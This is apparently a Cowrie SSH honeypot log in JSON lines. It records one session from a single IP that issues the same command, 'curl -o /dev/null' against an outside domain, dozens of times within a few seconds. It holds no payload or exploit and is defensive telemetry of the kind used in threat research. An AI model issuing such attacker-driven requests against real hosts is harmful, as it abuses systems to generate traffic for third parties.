{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.904359Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.953238Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.954156Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:47.990825Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:47.991883Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.040990Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.041981Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.085820Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.086548Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.131584Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.132666Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.171173Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.172177Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.217812Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.218956Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.256279Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.257272Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.294240Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.295064Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.331770Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.333017Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.370231Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.370987Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.407504Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.408428Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.455072Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.456190Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.493651Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.494573Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.531846Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.532745Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.569196Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.570077Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.607243Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.608189Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.647878Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.648938Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.686551Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.687955Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.724848Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.725792Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.762981Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.764002Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.800545Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.801659Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.848458Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.849347Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.885882Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.886808Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.923521Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.924675Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:48.963620Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:48.964538Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.001299Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.002298Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.038836Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.039794Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.076102Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.077102Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.114008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.114997Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.153109Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.154327Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.191548Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.192571Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.239274Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.240267Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.289632Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.290632Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.442955Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.444028Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.480782Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.481622Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.518396Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.519325Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.556200Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.557100Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.593438Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.595235Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.632200Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.633225Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.670155Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.671092Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.707875Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.709200Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.843183Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.844210Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.885012Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.886001Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.923921Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.925285Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:49.972089Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:49.973002Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.010339Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.011533Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.053165Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.054386Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.095796Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.096796Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.133862Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.134826Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.171384Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.172319Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.209377Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.210328Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.257505Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.258531Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.296777Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.297751Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.335016Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.335955Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.381392Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.382433Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.420707Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.421371Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.458711Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.459576Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.498433Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.499586Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.536831Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.537749Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.574440Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.575392Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.612524Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.613681Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.663311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.664174Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.700666Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:50.701728Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:50.738815Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
